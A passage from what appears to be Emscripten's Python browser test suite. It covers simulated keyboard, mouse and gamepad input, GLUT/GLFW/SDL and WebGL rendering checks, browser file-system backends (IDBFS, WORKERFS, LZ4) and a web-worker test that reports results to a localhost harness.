var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
open('test.html', 'w').write(html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
open(os.path.join(self.get_dir(), 'sdl_text.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'EXIT_RUNTIME=1']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
@requires_threads
def test_force_exit(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file',
path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_graphics_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
run_process([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
run_process([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL'])
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
